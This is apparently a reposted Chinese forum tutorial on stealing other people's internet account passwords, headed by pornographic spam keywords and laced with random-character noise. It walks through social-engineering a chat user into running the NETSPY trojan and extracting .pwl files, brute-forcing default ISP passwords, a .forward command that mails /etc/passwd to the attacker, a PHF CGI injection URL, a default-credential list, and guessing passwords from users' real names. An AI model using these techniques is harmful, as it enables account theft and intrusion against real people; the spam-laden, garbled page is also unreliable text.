中文字幕精品亚洲无线码,99视频在线观看精品29,亚州十八禁免费不卡在线视颖,亚洲香蕉网久久综合影视

<sub id="xxpls"></sub><sub id="xxpls"></sub>
  • <listing id="xxpls"><u id="xxpls"></u></listing>
    

    <sub id="xxpls"></sub>
  • <sub id="xxpls"><ol id="xxpls"></ol></sub>
    

    <style id="xxpls"><u id="xxpls"></u></style>
  • 

    汶上信息港
    
標(biāo)題: 如何得到別人的上網(wǎng)帳號和密碼 [打印本頁]
    

    
作者: 雜七雜八    時間: 2011-1-12 21:03
    
標(biāo)題: 如何得到別人的上網(wǎng)帳號和密碼
    如何得到別人的上網(wǎng)帳號和密碼,我在這里介紹幾種弱智方法。
    
9 a0 M2 v' P# f9 {3 G方案一:利用特洛伊木馬得到帳號。必備工具:NTESPY、PWLVIEW。
    
9 B1 Q* c( c* ~; d( Z2 Y優(yōu)點(diǎn):只要對方運(yùn)行了程序就有80%的成功率,而且不需要任何網(wǎng)絡(luò)入侵知識,只要能熟悉的操作上面兩個軟件即可。NETSPY是全中文軟件,一看就會。而PWLVIEW又是弱智操作只要在DOS下輸入PWLVIEW然后按回車即可。成功率高,操作簡單而且用不了多長時間是它最大的優(yōu)點(diǎn),只是......
    
2 J1 w! u. ~  q6 W3 [7 j缺點(diǎn):只有一個,那就是如何讓對方乖乖的運(yùn)行你的程序。- O0 I  u- R: f& {* @+ Z6 N  u2 a8 t
    
提示:先問清你的目標(biāo)和你是不是在一個城市。
    
% }* S# R& O. y5 H3 q/ q5 k9 B& L實(shí)戰(zhàn)演戲:一天,我在X海聊天室里尋找目標(biāo),遇見了同在北京的色鵝丟丟。我上前打招呼:丟丟好呀。丟丟說:你好呀。我又說:XXXXXXX(客套話,先和他拉關(guān)系)對了,我拿到了一個新程序,要不要看看?丟丟說:好呀,寄給我吧。7 y9 [% G9 ?/ X7 W2 a3 l* k0 x: G
    
哈哈,魚上鉤了!先把誘餌程序改個名,如改成readme之類的東東,然后和一些不相干的東西發(fā)過去,然后你讓他先運(yùn)行README。在這插一句,有一位大俠使用此法時,竟然把控制端程序和NETSPY的說明文件一起發(fā)了過去,真搞不懂他怎么想的。我對他說,你先運(yùn)行README,是中文說明。丟丟說:好...咦,怎么沒反映呀?(YEAH!)我又說:那你直接運(yùn)行軟件吧。丟丟說:好吧...不錯...我說:明天見...開始干活,連上他的機(jī)子后,現(xiàn)在C盤里找到了WIN95的目錄WINDOWS。也有可能是WIN95或WIN98,進(jìn)入后查找*.pwl,然后把所有后綴名為PWL的文件都抓過來,放在你的工具PWLVIEW的子目錄里。在DOS窗口下輸入PWLVIEW然后敲回車,丟丟的上網(wǎng)帳號和密碼就都顯示出來了。而且以后如果他上網(wǎng),NETSPY就會通知你,他就再也逃不出你的手掌心了。就算是他換了密碼,你也能在2分鐘內(nèi)再把他搞定。
    
7 [5 v4 v; U$ P6 p忠告:你用他的帳號上網(wǎng)后第一件事就是先去查看他的上網(wǎng)時間。分析一下他一般幾點(diǎn)上網(wǎng)以避免撞車。; J9 q. e9 N) C8 f; ~+ n
    
方案二:利用ISP的疏忽做文章舉。例用工具:EMAILCRK或網(wǎng)絡(luò)刺客% S& J) }$ A3 P8 R
    
優(yōu)點(diǎn):沒什么優(yōu)點(diǎn)
    
& z. h/ g5 B9 z8 @缺點(diǎn):要具體情況具體對待,太麻煩
    
7 {9 Q0 B! J8 V0 K/ T提示:平時多多留神。8 o3 {# u8 q1 D  O
    
譬如,某個ISP給你開好了帳號,然后又畫蛇添足的給你一個郵箱,地址是:你的帳號@xxx.net
    
# m; Q' Q* I! {: S密碼和你的上網(wǎng)密碼一樣。也就是說,只要你能敲開郵箱的密碼就一切OK了。& F; x4 G1 T) u( Z$ O7 p  x  p( Q
    
運(yùn)行EMAILCRK或網(wǎng)絡(luò)刺客,套上字典后就等著。一般沒有XX個小時搞不定,不成功的可能性很大,而且破解時還必須要上網(wǎng)。你的機(jī)子要是快可以開上三四個窗口,套上不同的字典一起破
    
; j7 }- c5 u1 K, a, U. z/ y方案三:侵入郵局主機(jī)然后把PASS檔抓回來,然后用JOHN或JACK套上字典開始破。. F7 j5 v% {1 O) A) L
    
優(yōu)點(diǎn):一次可以破出好多帳號,而且如果運(yùn)氣好還能拿到ROOT,這個主機(jī)就要?dú)w你控制了。而且破解時不用上網(wǎng),可以好幾臺機(jī)子一起破。
    
& y' @5 D) U7 t, y缺點(diǎn):對于初學(xué)者有一定困難,尤其是只想拿一個上網(wǎng)帳號這樣做恐怕會得不償失。而且被發(fā)現(xiàn)的可能性很大,情節(jié)嚴(yán)重且性質(zhì)惡劣,一定要慎重對待。
    
- v; a) A5 p8 l* m  |. P由于介紹此類的教學(xué)文章比較多,我就不班門弄斧了。 + j, @7 }! F3 n( ^# ^' {
    

    
0 \8 K# f( [3 h. X' `哈哈,我來說說最簡單的入侵方法。其實(shí)入侵大體的原理相同,主要是利用系統(tǒng)的漏洞(BUG)來做文章。3 d. x6 p' g4 o, ~6 y1 C" Z: Q/ ~
    
只不過有的網(wǎng)站漏洞難找有的好找而已。一個好的黑客,就是要能很快的發(fā)現(xiàn)漏洞并加以利用。下面我給大家舉一個小栗子。) T1 Z" o7 Y7 `
    
有一天,我去XX熱線申請主頁,發(fā)現(xiàn)那里采用的是機(jī)器自動回信,信的大概格式如下:) }8 e! a/ I6 |) {  O$ u2 K& l
    

    
, X4 {9 b9 ^# c  J9 J" Y3 u------------------------------: H; t5 ]" w' e# r; ~
    

    
* \, |5 A. c9 a, p* wXXX,你好(XX是你在表格上填的名字)
    
9 E( m$ @2 P! z; ?" q/ ?4 Y你在XX熱線的主頁空間已開通$ a8 ?3 a& e8 U4 F/ N1 ]
    
帳戶名:XXX 密碼:11
    
* P' s; W" j( i" A+ {-----------XX熱線
    
! _) ?# S4 M* @$ W3 b+ {電話:XXXX-XXXXXXXX  w8 l8 s" j7 W' |) E9 E
    
------------------------------
    
3 [4 `, A& c* m* R' C% R! x( ^% ~- d. H# d8 Q7 v; w7 V" w
    
好了,由于是機(jī)器回信,所以那里所有人的初始密碼都是11,而且該熱線要更改密碼要TELNET到郵局主機(jī)去改,有許多網(wǎng)友并沒有接觸過如何T主機(jī),所以他們使用的還是初始密碼11。
    
5 w7 a7 f. ~- O' @0 Q* h7 }. v開始干活了,打開FTP軟件,輸入XX熱線的IP,密碼11,然后挨個輸入帳戶名。帳戶名可去XX熱線的主頁空間列表里查看,先試試AAAA,。。。沒成功,再換一個,AABB。。。還是不行。哈哈,這個用戶名短,沒準(zhǔn)能行。輸入AA。。。進(jìn)去了。寄下用戶名然后繼續(xù)試,ABC。。。又成功了,看來沒改密碼的人很多呀。試幾個就行了,現(xiàn)在,你已經(jīng)擁有這些帳戶的控制權(quán)了。
    
' Z$ Z& @5 h5 x( h上面的這個栗子很簡單,一般象這么大的漏很難找。要侵入一個稍微象點(diǎn)話的站臺就要耗費(fèi)你大量的時間和金錢,而且還未必能成功。即使成功了,你不改它實(shí)在無趣,改了恐怕會步馬X的后塵。此人侵入貴陽的主機(jī)并把界面換成了一張淫穢圖片。害的自己吃飯不用花錢了。所以我在這里勸大家一句,把這方面的精力放到全心全意為人民服務(wù)上去。實(shí)在不行就去聊天室,看誰不聽話就炸他,同樣很過癮的!4 d4 W0 Y4 ~. @; d* m5 Z5 H
    
  : d; [( v3 x: }
    

    
, Y( b: b, n- I: Q7 p" M                           如何獲得第一個帳號7 P' l2 X& Z& V
    
+ d# l+ f' v! k# `: v! \0 ^9 }
    
我們這種水平不高的黑客入侵都是先得到系統(tǒng)的一個有效帳號,進(jìn)入后再利用系統(tǒng)BUG得到ROOT權(quán)限或想辦法得到SHADOW再解密.無論是利用系統(tǒng)漏洞還是得到SHADOW都是有一定規(guī)律可尋的,通常你到一些黑客站點(diǎn)找到對應(yīng)系統(tǒng)相應(yīng)版本的EXPLOIT編譯后執(zhí)行就行了.我感覺最困難的是獲得第一個有效的帳號,有時侯費(fèi)盡力氣也得不到,后來總算是積累了一些經(jīng)驗(yàn),想寫出來和大家交流一下,希望能拋磚引玉,請高手們把更好的方法告訴我.
    
# d3 ~' {% S$ I
    
+ d; h' ^& ?( P- n- W! b2 s- K, m確定了目標(biāo)以后,我通常是先用匿名FTP去看一下,許多網(wǎng)站都開匿名FTP,帳號用ANONYMOUS或是FTP,密碼用一個EMAIL帳號(當(dāng)然是假的),進(jìn)入后到/etc目錄下把PASSWD拿回來,一般情況下都是一份很不全的名單,只有幾個系統(tǒng)帳號,那就算白來了:-}但有的時候會有比較傻的管理員把一些普通帳號放進(jìn)去,這就是很重要的信息,雖然只有帳號沒有密碼,但畢竟邁出了第一步.如果FTP主目錄是drwxr-xr-x,做一個.foward文件傳上去,在UNIX下的命令應(yīng)該是echo"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr" > .forward然后給匿名用戶寫一封信,它會把PASSWD發(fā)給你。
    
& y+ c" _) G2 U) q5 f% _# B1 C+ V- R9 K
    
如果目標(biāo)沒有匿名FTP,就通過WWW訪問它的主頁,看看上面有什么信息,例如通過一些聯(lián)系人的EMAIL你就可以發(fā)現(xiàn)一些帳號,有的網(wǎng)頁上甚至列出了EMAIL通訊錄,這對黑客來講就是無價之寶.把這些帳號記下來,非常有用.
    
3 d' P9 E* M7 x" @0 a! N9 H/ A- R$ P3 |. N. S
    
以上幾個方法都不行的話,那就試試PHF查詢.在瀏覽器的地址欄輸入http://攻擊目標(biāo)/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd如果成功的話會顯示出PASSWD來,但是成功率極低:-< 
    
4 ~4 [" F7 v, Y" f! M
    
* `% V+ v' ~# t4 Z8 d. {還可以利用目標(biāo)的FINGER功能來積累帳號,如利用HAKTEK(一種掃描器)來監(jiān)視目標(biāo),一旦有人登陸該主機(jī)就會報告給你.但這種方法的缺點(diǎn)就是浪費(fèi)時間,如果你是自己花錢上網(wǎng)的話可就要出血了!2 U- o# R6 _$ {1 K9 X
    
; m" L  _9 Q2 @" c% `4 Y
    
很有可能以上的方法都不行,那只好使出我的看家本事了-------猜!!!有一些系統(tǒng)默認(rèn)的帳號,例如:
    
3 O+ W0 ^, i2 @6 x, r. ]9 \7 E2 l5 w4 V# G2 p$ D! o. Q
    
帳號     密碼
    
! q: y! G' Z& s! ?# q----------- ----------------/ x( y% _3 O* k! X  {* y
    
root    root
    
: f4 w: N2 P2 w7 |+ l" Q- d9 h. Bsys     sys/system/bin( C# N. Y5 Z& L! ~8 O; A% \& C
    
bin     sys/bin4 N4 T& E$ d+ A+ m/ C( H
    
mountfsys  mountfsys
    
; `7 Q/ j3 Z, d6 K: o; zadm     adm" @8 E: Z6 u9 p
    
uucp    uucp
    
) \+ E2 G6 g3 \nuucp    anon
    
# h, [7 T1 f" z5 ~anon    anon
    
/ ?& t' W2 c, H& W) e- wuser    user. u3 R  z: \$ W3 O$ h( N
    
games    games6 Z4 ^0 n9 \$ c( D
    
install   install, a5 S! A* T' F" Y6 C: H$ X5 v; X
    
reboot   給 "command login" 用的, a* y/ |1 c; Z+ z) b/ r; A$ E
    
demo    demo
    
$ j8 N9 f8 b2 ~umountfsys umountfsys0 D9 ~- J- h- C2 C( M7 Z5 {: A
    
sync     sync: a/ \9 a% a, y4 x+ w8 @
    
admin    admin
    
) P' `0 i4 R$ Kguest    guest  F5 q# q3 E/ T2 x* V
    
daemon   daemon5 N; ^7 n% j; [- _4 }) e2 X5 V8 r
    
________________________________________________________________8 c' @& M' Z% o3 f# ?  B
    
0 E. ]+ I+ b$ ~2 w/ P
    
有些管理員忘記把他們改掉,那你就發(fā)財了!
    
5 F2 t3 ?  S* B5 U* r
    
9 ]; U7 `) c% e6 U另外還有一些習(xí)慣性帳號如:test,www,html,web,oracle,setup,sybase,john,tom等也都應(yīng)該試一試.
    
; E: L1 I+ |2 o! V/ Q: G7 q9 o: a' K7 _4 K( y- v( O
    
只有帳號還不能進(jìn)入系統(tǒng),但有了帳號搞密碼就容易一些了,主要辦法還是猜.如果是通過PASSWD知道帳號的那你應(yīng)該會發(fā)現(xiàn)該用戶的許多信息,例如:: @3 ^! G: f& Z3 W3 f; y4 g' k
    

    
( ^4 ^$ C' `; D7 s3 o* v.........
    
; Z5 j1 o1 C: [" n+ W- A! @7 U9 v" ?, g2 |: `' A
    
xlguo:x:263:50:Guo xiaolin:/usr/xlguo:/bin/sh
    
% G7 X+ U5 C' H- e
    
1 D& o6 O/ H+ P! n- S8 e3 ?; Gqingyuan:x:275:50::/usr/qingyuan:/bin/sh
    
& Z- o" P5 ~+ d) i/ k! c7 G2 {4 J8 S7 C8 ]. Q7 Y
    
hjhuang:x:278:50:Huang Haijun:/usr/hjhuang:/bin/sh
    
$ o, a* `$ C- D+ w& i! o: F
    
% Q! ]* {6 v+ @" u" msmlian:x:282:50:Mr. Lan Shumin:/usr/smlian:/bin/sh
    
0 E/ E0 v8 G) b/ V
    
+ e, U) @8 l+ [% E7 ]kyc:x:293:50:Department of Science & Technology:/usr/kyc:/bin/sh# d. |3 A* K9 p+ y! g9 ^! Z
    
2 _0 n3 c7 J) |( [
    
brlu:x:300:50:Lu Baoren:/usr/brlu:/bin/sh: a3 V' G9 n/ O" _( P& k
    

    
# R" W$ e9 @( f% Utide:x:301:50:Wang XinYi:/usr/tide:/bin/sh
    
: j3 G6 G) W1 r. Z5 ?
    
: @) `9 |  C/ T............& Y' e. \! o6 O& @# U
    
# ^7 c( e# {9 C" S# p
    
這是一部分PASSWD,從這兒我們可以得到七個帳號,注意每一行的第五項,那是該用戶的真實(shí)姓名,對!就用它來做密碼試.成功率還是比較高的.; ?( g# V' C) K" A
    
+ d7 `% q7 w- q4 }+ p9 e
    
如果是用其他方法獲得帳號的,就用FINGER查詢來獲得相關(guān)信息.例如知道一個帳號support,我們就用網(wǎng)絡(luò)刺客II里的FINGER項來偵察support@xxx.xxx.xxx會獲得很多該帳號的信息例如真名實(shí)姓,電話號碼等就用這些做密碼來猜">如果是用其他方法獲得帳號的,就用FINGER查詢來獲得相關(guān)信息.例如知道一個帳號support,我們就用網(wǎng)絡(luò)刺客II里的FINGER項來偵察support@xxx.xxx.xxx會獲得很多該帳號的信息例如真名實(shí)姓,電話號碼等就用這些做密碼來猜.9 s4 K7 [/ J0 W% z
    
% z# K: n+ C1 Z) u/ `) _# v4 K; C
    
當(dāng)然最可能的密碼還是帳號本身和一些帳號的變形,如帳號是john,密碼可能是nhoj,john123,john888等.或是一些簡單數(shù)字.總之是要費(fèi)一番工夫來猜的.- U: v6 Y( B2 j8 K: [5 q
    
* r$ t4 G  A' G8 q! I/ }
    
如果還猜不出密碼,只好用LETMEIN之類的東西來猜,字典一定要好.否則,你的電話費(fèi)就要.....而且這種方法比較危險,還是不用為好.
    
% s1 f/ _7 Z7 E1 V! f" a! }9 h$ v1 c+ G5 D* x. s
    
最后實(shí)在不行還有一種比較卑劣的手段,就是給該網(wǎng)站的網(wǎng)管寫封信,想辦法騙他執(zhí)行特洛伊木馬,然后再.......算了,不說了.' S% I" ?+ V4 q4 m% q' t  ]
    
- H6 ]! N/ F; D2 }7 `& }/ K
    
你可能發(fā)現(xiàn)以上這些方法都不能百分之百的成功,或者說成功率是比較低的,因?yàn)槲乙膊恢栏玫姆椒?但我感到一定有一種更好的方法,希望有高手見到此文能告訴我.2 }% t& _$ X3 K, F4 e+ Q
    

    
8 S' k4 V% E2 y1 g




    

    

    歡迎光臨 汶上信息港 (http://huihexinxi.com.cn/)

Powered by Discuz! X3.5